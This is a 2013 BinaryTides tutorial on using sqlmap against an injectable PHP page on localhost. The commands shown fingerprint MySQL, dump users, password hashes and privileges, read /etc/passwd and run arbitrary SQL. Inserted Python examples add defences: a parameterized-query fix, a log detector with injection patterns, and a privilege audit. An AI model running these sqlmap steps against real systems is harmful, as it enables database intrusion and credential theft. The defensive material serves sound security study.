BinaryTides - Coding, Software, Tech and Reviews

How to hack remote database with sqlmap


By Silver Moon | April 15, 2013


In the previous post on sqlmap basics we learned how to use sqlmap to hack a
vulnerable web application and fetch the list of databases, tables, columns and
data rows. In this post we shall see how to do some simple fingerprinting on the
remote database to find valuable information that can be used to assist in
further exploitation of a system.

So let's say we have a vulnerable URL

http://localhost/weak.php?id=10

where the id parameter is not escaped properly in the PHP code and suffers from
a SQL injection vulnerability. The command to list out the databases would be

$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs

Then use the -T, --columns and --dump options to list out the tables of a
database, the columns of a table, the data in a table and so on.
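The defect behind that URL, shown as an added example that is not code from the original post: the post's application is PHP on MySQL, but the same concatenation pattern and its fix are rebuilt here in Python against an in-memory sqlite3 database (an assumed stand-in so the example runs offline). The profiles table, its rows and the probe value are constructed for the example.

```python
"""Added example (not code from the BinaryTides post): the unescaped-id
defect behind weak.php and its fix, rebuilt in Python against an in-memory
sqlite3 database. sqlite3 stands in for the post's PHP/MySQL stack (an
assumption); the 'profiles' table and its rows are constructed."""
import sqlite3

# Constructed sample rows standing in for the remote 'profile_data' content.
SAMPLE_ROWS = [(10, "alice"), (11, "bob"), (12, "carol")]


def make_db():
    """Create an in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO profiles VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, id_param):
    """The defect: the raw query-string value is concatenated into the SQL
    text, so anything after the number becomes part of the statement."""
    sql = "SELECT id, name FROM profiles WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_param):
    """The fix: enforce the expected type, then bind the value as a query
    parameter so the driver never parses it as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # anything that is not a plain integer is rejected outright
    sql = "SELECT id, name FROM profiles WHERE id = ?"
    return conn.execute(sql, (id_value,)).fetchall()


def demo():
    """Run both versions against a normal value and a scanner-style tautology.
    With the vulnerable query the tautology turns a one-row lookup into a
    full-table read; the parameterized version returns nothing for it."""
    conn = make_db()
    normal = "10"
    probe = "10 OR 1=1"  # the kind of truth test a scanner uses to confirm injectability
    return {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_probe": lookup_vulnerable(conn, probe),
        "safe_normal": lookup_parameterized(conn, normal),
        "safe_probe": lookup_parameterized(conn, probe),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The type check in lookup_parameterized is deliberate: binding alone already stops the value from being parsed as SQL, but rejecting non-integer input as well keeps the application from passing obviously malformed values to the database at all, which also makes the probing visible as application errors rather than as database errors.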

Fingerprinting the remote system and its database

To find out more information about the remote system's database, use the option
"-b". It will try to find the exact banner of the database server. Let's try it on a
MySQL database.

$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b

.....

[11:19:51] [INFO] the back-end DBMS is MySQL
[11:19:51] [INFO] fetching banner
[11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:19:51] [INFO] retrieved: 5.1.61
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
banner: '5.1.61'

The output has the banner text, which is "5.1.61". This is the MySQL banner and
clearly shows the MySQL version in use. Now you can search Google for any
MySQL vulnerabilities that might exist in this version.

The next command will fetch the list of users along with their password hashes,
privileges and roles.

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10

..........

database management system users [5]:

[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
.............

database management system users password hashes:

[*] [1]:
password hash: NULL
[*] root [2]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
password hash: NULL

........

[*] %root% (administrator) [27]:

privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

Getting the current user, current database and hostname information

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10
........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database: 'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain
hostname: 'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA: False

So from the above output we have the current user, the current database and the
hostname.
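Each of the retrievals above is made up of many HTTP requests carrying SQL fragments in the id parameter, and that is what the target's web server log records. The following detection check is an added example, not code from the post or from sqlmap: it parses constructed Apache combined-format log lines and groups requests whose decoded parameter values carry injection indicators by client address. The "sqlmap/" User-Agent prefix is sqlmap's default; it is assumed here rather than taken from the post, and a real run can override it, so the check relies mainly on request content rather than on the User-Agent.

```python
"""Added example (not from the BinaryTides post): a defender-side check that
scans web server access-log lines for the kind of probing the post's sqlmap
runs produce. Log lines are constructed for this example; the 'sqlmap/'
User-Agent prefix is sqlmap's default and is assumed here, since the post
does not show it, and a real run can change it."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines: one ordinary visit, then a burst
# against weak.php from a second address with SQL fragments in 'id'.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Apr/2013:11:19:40 +0000] "GET /weak.php?id=10 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Apr/2013:11:19:51 +0000] "GET /weak.php?id=10%27 HTTP/1.1" 500 0 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [15/Apr/2013:11:19:51 +0000] "GET /weak.php?id=10%20AND%201%3D1 HTTP/1.1" 200 812 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [15/Apr/2013:11:19:52 +0000] "GET /weak.php?id=10%20AND%201%3D2 HTTP/1.1" 200 402 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [15/Apr/2013:11:19:52 +0000] "GET /weak.php?id=10%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%40%40version HTTP/1.1" 200 900 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [15/Apr/2013:11:19:53 +0000] "GET /weak.php?id=10 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Generic injection indicators, matched against each URL-decoded parameter value:
# quote characters, comment openers, SQL keywords, or a boolean test such as "AND 1=".
SQLI_RE = re.compile(
    r"""['"]|--|/\*|\b(?:UNION|SELECT|SLEEP|BENCHMARK|LOAD_FILE|INFORMATION_SCHEMA)\b|\b(?:AND|OR)\b\s+\S+\s*=""",
    re.IGNORECASE,
)


def parse_line(line):
    """Split one log line into fields; parse_qsl URL-decodes the query values."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def suspicious_params(rec):
    """Names of query parameters whose decoded value carries an injection indicator."""
    return [name for name, value in rec["params"] if SQLI_RE.search(value)]


def analyze(log_text):
    """Group requests by client address: total requests, how many carried SQL
    fragments, which path/parameter pairs were hit, and whether a scanner
    User-Agent was seen."""
    report = defaultdict(lambda: {"requests": 0, "sqli_hits": 0,
                                  "targets": set(), "scanner_ua": False})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report[rec["ip"]]
        entry["requests"] += 1
        hits = suspicious_params(rec)
        if hits:
            entry["sqli_hits"] += 1
            entry["targets"].update(f"{rec['path']}?{p}" for p in hits)
        if "sqlmap" in rec["ua"].lower():  # default UA prefix; assumed, easily changed
            entry["scanner_ua"] = True
    return dict(report)


def alerts(log_text, min_hits=3):
    """Client addresses worth escalating: a scanner UA, or repeated SQL-looking values."""
    return sorted(ip for ip, e in analyze(log_text).items()
                  if e["scanner_ua"] or e["sqli_hits"] >= min_hits)


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry)
    print("escalate:", alerts(SAMPLE_LOG))
```

The per-address threshold matters more than the User-Agent match: the post's runs use --threads=10, so the tell-tale sign in a real log is a tight burst of requests to one path with varying, SQL-shaped values for the same parameter, not any single request.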

Reading a system file

On MySQL, if the database user has the FILE privilege, it can read files from the
server's file system. It can read only those files that are world-readable or
readable by the mysql user. Here is a quick example that reads the /etc/passwd
file.

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10

sqlmap will store the retrieved file in its directory on the local file system, so
that it can be read later.
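Whether this works depends entirely on the privileges of the account the web application connects with, so the practical defence is to audit those grants. The following check is an added example, not code from the post: it parses constructed MySQL SHOW GRANTS lines for an account named webapp (an assumed name; the database name profile_data comes from the post's output) and flags FILE and other privileges a web application has no use for, as well as any grant that reaches outside the application's own database.

```python
"""Added example (not from the BinaryTides post): an audit of MySQL
SHOW GRANTS output for the account a web application connects with. The
grant lines below are constructed; the account name 'webapp' is an
assumption, while the database name profile_data comes from the post."""
import re

# Privileges that let an injected query leave the database layer (FILE, as the
# post's --file-read example shows) or administer the server itself.
HIGH_RISK = {"ALL PRIVILEGES", "ALL", "FILE", "SUPER", "PROCESS", "SHUTDOWN",
             "RELOAD", "CREATE USER", "GRANT OPTION"}

# A web application normally needs no more than row-level access to its own schema.
APP_BASELINE = {"SELECT", "INSERT", "UPDATE", "DELETE"}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<user>\S+)"
    r"(?P<grant_opt>\s+WITH GRANT OPTION)?",
    re.IGNORECASE,
)

# Constructed: the application account before and after applying least privilege.
GRANTS_BEFORE = [
    "GRANT SELECT, INSERT, UPDATE, DELETE, FILE ON *.* TO 'webapp'@'localhost'",
]
GRANTS_AFTER = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `profile_data`.* TO 'webapp'@'localhost'",
]


def parse_grant(line):
    """Turn one SHOW GRANTS line into its privilege set, scope and grantee."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    if m.group("grant_opt"):
        privs.add("GRANT OPTION")
    return {"privs": privs,
            "scope": m.group("scope").replace("`", ""),
            "user": m.group("user")}


def audit(grant_lines, app_db):
    """Return a list of findings; an empty list means the account stays
    within the application baseline on its own database."""
    findings = []
    for line in grant_lines:
        g = parse_grant(line)
        if g is None:
            findings.append(f"unparsed grant: {line}")
            continue
        privs = g["privs"] - {"USAGE"}  # USAGE is MySQL's way of saying 'no privileges'
        scope = g["scope"]
        for p in sorted(privs & HIGH_RISK):
            findings.append(f"{g['user']}: high-risk privilege {p} on {scope}")
        if privs and not scope.startswith(f"{app_db}."):
            findings.append(f"{g['user']}: privileges outside {app_db}: {scope}")
        for p in sorted(privs - HIGH_RISK - APP_BASELINE):
            findings.append(f"{g['user']}: beyond application baseline: {p} on {scope}")
    return findings


if __name__ == "__main__":
    print("before:", audit(GRANTS_BEFORE, "profile_data"))
    print("after: ", audit(GRANTS_AFTER, "profile_data"))
```

Run against the post's own scenario, where the application connects as root with the full privilege list shown above, every one of FILE, SUPER, PROCESS, SHUTDOWN, RELOAD and CREATE USER would be reported, which is exactly the exposure that turns a data-reading injection into --file-read.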

Run arbitrary SQL commands

The --sql-query option can be used to run arbitrary SQL queries on the database.

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"

...........

[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10

select now();: '2013-04-15 11:51:10'

The last line of the output is the result of the SQL query that was run on the
remote database.

Conclusion

So with all the above information it gets easier to get further into the system
and eventually take control of it, if possible. sqlmap does quite a massive task
by discovering the database, the data and details about the operating system.
But in most cases it might not be able to provide full control of the remote
system in the form of a shell.

Further techniques need to be employed to get greater control of the system
and eventually root. We shall be discussing those in upcoming tutorials.

Last Updated On : 15th April 2013

Comments on "How to hack remote database with sqlmap"
Roy Paul
July 17, 2016 at 2:02 pm
thank you for this tutorial.

Copyright © 2019 · BinaryTides
